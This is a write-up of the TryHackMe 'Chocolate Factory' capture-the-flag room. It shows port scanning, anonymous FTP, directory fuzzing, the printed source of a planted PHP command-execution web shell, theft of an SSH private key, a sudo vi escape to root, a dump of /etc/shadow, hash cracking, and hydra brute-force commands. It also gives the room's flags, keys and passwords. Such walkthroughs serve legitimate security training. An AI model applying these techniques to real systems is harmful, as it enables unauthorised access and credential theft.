Information
Room
Name: Chocolate Factory
Profile: tryhackme.com
Difficulty: Easy
Description : A Charlie And The Chocolate Factory themed room, revisit Willy Wonka's chocolate factory!
Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1 $ sudo pacman -S nmap perl-image-exiftool ffuf john hashcat hydra
Network enumeration
Service & port discovery scan:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 # Nmap 7.91 scan initiated Mon Jan 18 19:27:21 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.56.113 Nmap scan report for 10.10.56.113 Host is up (0.080s latency). Not shown: 65506 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_auth-owners: ERROR: Script execution failed (use -d to debug) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-rw-r-- 1 1000 1000 208838 Sep 30 14:31 gum_room.jpg | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.19.77 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |_auth-owners: ERROR: Script execution failed (use -d to debug) | ssh-hostkey: | 2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA) | 256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA) |_ 256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_auth-owners: ERROR: Script execution failed (use -d to debug) | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). ... 112/tcp open mcidas? |_auth-owners: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | GenericLines, NULL: | "Welcome to chocolate room!! | ___.---------------. | .'__'__'__'__'__,` . ____ ___ \r | _:\x20 |:. \x20 ___ \r | \'__'__'__'__'_`.__| `. \x20 ___ \r | \'__'__'__\x20__'_;-----------------` | \|______________________;________________| | small hint from Mr.Wonka : Look somewhere else, its not here! ;) |_ hope you wont drown Augustus" 113/tcp open ident? |_auth-owners: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq: |_ http://localhost/key_rev_key <- You will find the key here!!! 114/tcp open audionews? |_auth-owners: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | GenericLines, NULL: | "Welcome to chocolate room!! | ___.---------------. | .'__'__'__'__'__,` . ____ ___ \r | _:\x20 |:. \x20 ___ \r | \'__'__'__'__'_`.__| `. \x20 ___ \r | \'__'__'__\x20__'_;-----------------` | \|______________________;________________| | small hint from Mr.Wonka : Look somewhere else, its not here! ;) |_ hope you wont drown Augustus" ...
There is some useless rabbit hole from port 100 to 125 but look at port 113!
FTP discovery
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ ftp 10.10.56.113 Connected to 10.10.56.113. 220 (vsFTPd 3.0.3) Name (10.10.56.113:noraj): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -A 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 208838 Sep 30 14:31 gum_room.jpg $ ftp> get gum_room.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes). 226 Transfer complete. 208838 bytes received in 0.136 seconds (1.46 Mbytes/s) ftp> 221 Goodbye.
We have an image that we downloaded.
It seems there is no metadata on it.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ exiftool gum_room.jpg ExifTool Version Number : 12.00 File Name : gum_room.jpg Directory : . File Size : 204 kB File Modification Date/Time : 2021:01:18 19:30:23+01:00 File Access Date/Time : 2021:01:18 19:30:23+01:00 File Inode Change Date/Time : 2021:01:18 19:31:54+01:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg Exif Byte Order : Big-endian (Motorola, MM) Image Width : 1920 Image Height : 1080 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1920x1080 Megapixels : 2.1
This may be a rabbit hole.
Port 113
There is a hint on port 113.
1 2 3 4 5 113/tcp open ident? |_auth-owners: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | GenericLines, Help, NCP, NULL, NotesRPC, SSLSessionReq: |_ http://localhost/key_rev_key <- You will find the key here!!!
Then we can get the key.
1 $ wget http://10.10.56.113/key_rev_key
Let's look, it's not a key but a binary:
1 2 3 4 5 6 7 8 9 $ strings key_rev_key ... Enter your name: laksdhfas congratulations you have found the key: b'edited' Keep its safe Bad name! ...
The key:
-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=
By the way the username was laksdhfas
.
Web enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 $ ffuf -u http://10.10.56.113/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.2.0-git ________________________________________________ :: Method : GET :: URL : http://10.10.56.113/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 :: Filter : Response status: 403 ________________________________________________ index.html [Status: 200, Size: 1466, Words: 87, Lines: 70] home.php [Status: 200, Size: 569, Words: 29, Lines: 32] . [Status: 200, Size: 1466, Words: 87, Lines: 70] validate.php [Status: 200, Size: 93, Words: 2, Lines: 1] index.php.bak [Status: 200, Size: 273, Words: 45, Lines: 13]
There is webshell on http://10.10.56.113/home.php .
And index.php.bak
seems to be a backup of that webshell.
1 2 3 4 5 6 7 8 9 10 11 12 13 <html> <body> <form method="POST" > <input id="comm" type="text" name="command" placeholder="Command" > <button>Execute</button> </form> <?php if (isset ($_POST ['command' ])) { $cmd = $_POST ['command' ]; echo shell_exec ($cmd ); } ?>
Web exploitation & EoP from www-data to charlie
So if we run: ls -lhA /home/charlie
we get:
1 2 3 4 5 6 7 8 9 total 32K -rw-r--r-- 1 charlie charley 3.7K Apr 4 2018 .bashrc drwx------ 2 charlie charley 4.0K Sep 1 17:17 .cache drwx------ 3 charlie charley 4.0K Sep 1 17:17 .gnupg drwxrwxr-x 3 charlie charley 4.0K Sep 29 18:08 .local -rw-r--r-- 1 charlie charley 807 Apr 4 2018 .profile -rw-r--r-- 1 charlie charley 1.7K Oct 6 17:13 teleport -rw-r--r-- 1 charlie charley 407 Oct 6 17:13 teleport.pub -rw-r----- 1 charlie charley 39 Oct 6 17:11 user.txt
We can retrieve a private key: cat /home/charlie/teleport
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW 1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUb L4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYj B3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oY fOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEE RaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4Ej Di32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9 zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tF w8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFl kR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZ j4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2 EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/T RcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biF uAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idA KuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQ RZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19 znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PB la7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GB FVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg 82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK 37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamv ySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjb Jq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkM Qxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQm G2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln -----END RSA PRIVATE KEY-----
Let's set the right permissions on it and connect via SSH with it:
1 2 3 4 5 6 7 $ chmod 600 teleport $ ssh -i teleport charlie@10.10.56.113 charlie@chocolate-factory:/$ pwd / charlie@chocolate-factory:/$ cd /home/charlie charlie@chocolate-factory:/home/charlie$ cat user.txt flag{edited}
User flag:
flag{cd5509042371b34e4826e4838b522d2e}
We can also read the source code of the login page:
1 2 3 4 5 6 7 8 9 10 11 root@chocolate-factory:/var/www/html# cat validate.php <?php $uname=$_POST['uname']; $password=$_POST['password']; if($uname=="charlie" && $password=="edited"){ echo "<script>window.location='home.php'</script>"; } else{ echo "<script>alert('Incorrect Credentials');</script>"; echo "<script>window.location='index.html'</script>"; }
Charlie's password:
cn7824
Elevation of Privilege (EoP): from charlie to root
We can launch vi
as root:
1 2 3 4 5 6 7 $ charlie@chocolate-factory:/home/charlie$ sudo -l Matching Defaults entries for charlie on chocolate-factory: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User charlie may run the following commands on chocolate-factory: (ALL : !root) NOPASSWD: /usr/bin/vi charlie@chocolate-factory:/home/charlie$ sudo vi
Then in vi launch a shell: :!/bin/bash
.
There is no flag but a python script:
1 2 3 4 5 6 7 root@chocolate-factory:/home/charlie# id uid=0(root) gid=0(root) groups=0(root) root@chocolate-factory:/home/charlie# cd /root root@chocolate-factory:/root# cat root.txt cat: root.txt: No such file or directory root@chocolate-factory:/root# ls root.py
Let's see the script:
1 2 3 4 5 6 7 8 9 10 11 from cryptography.fernet import Fernetimport pyfigletkey=input ("Enter the key: " ) f=Fernet(key) encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ' dcrypt_mess=f.decrypt(encrypted_mess) mess=dcrypt_mess.decode() display1=pyfiglet.figlet_format("You Are Now The Owner Of " ) display2=pyfiglet.figlet_format("Chocolate Factory " ) print (display1)print (display2)
The script is asking for the key to decrypt the flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 root@chocolate-factory:/root# python root.py Enter the key: "-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=" __ __ _ _ _ _____ _ \ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___ \ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \ | | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/ |_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___| ___ ___ __ / _ \__ ___ __ ___ _ __ / _ \ / _| | | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_ | |_| |\ V V /| | | | __/ | | |_| | _| \___/ \_/\_/ |_| |_|\___|_| \___/|_| ____ _ _ _ / ___| |__ ___ ___ ___ | | __ _| |_ ___ | | | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \ | |___| | | | (_) | (_| (_) | | (_| | || __/ \____|_| |_|\___/ \___\___/|_|\__,_|\__\___| _____ _ | ___|_ _ ___| |_ ___ _ __ _ _ | |_ / _` |/ __| __/ _ \| '__| | | | | _| (_| | (__| || (_) | | | |_| | |_| \__,_|\___|\__\___/|_| \__, | |___/ flag{edited}
Root flag:
flag{cec59161d338fef787fcb4e296b42124}
Bonus: hash cracking
We may have missed charlie's password so now that we are root let's grep
the hash and crack it.
1 2 3 4 root@chocolate-factory:/root# cat /etc/shadow root:$6$.hWj2crD$ch//0HP/gRcEpyW10XktEpu0bDYU51MZaUuzHpb..Han2SFSiNEZgc1/utcnlKbyyhUKb768ouSAd8ITNlWlb/:18534:0:99999:7::: ... charlie:$6$J1Cmev6V$ifUMOM0VViXR0/8BKz7FLIG8mkT5i1QHdzAXV6A.9l8g51baubW6QK4CHKuKzRGL75cmc/W6hv3VNUSOukcmM1:18534:0:99999:7:::
Crack the hash with john:
1 2 3 4 5 6 7 8 9 10 11 $ john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 2232 (root) 2232 (charlie) 2g 0:00:05:10 DONE (2021-01-18 20:37) 0.006434g/s 1433p/s 2867c/s 2867C/s 231116..2221985 Use the "--show" option to display all of the cracked passwords reliably Session completed
Crack the hash with hashcat:
1 $ hashcat -m 1800 hashes.txt /usr/share/wordlists/passwords/rockyou.txt -O
Both the web and system passwords are included in rockyou so we could just have
used hydra to brute-force them (but it would have required a ridiculous amount
of time because the BF over SSH is only about 30 tries/min and about 2800 tries/min
over HTTP).
1 2 $ hydra -l root -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 -t 4 ssh $ hydra -l charlie -P /usr/share/wordlists/passwords/rockyou.txt 10.10.56.113 http-post-form '/validate.php:uname=^USER^&password=^PASS^:F=Incorrect'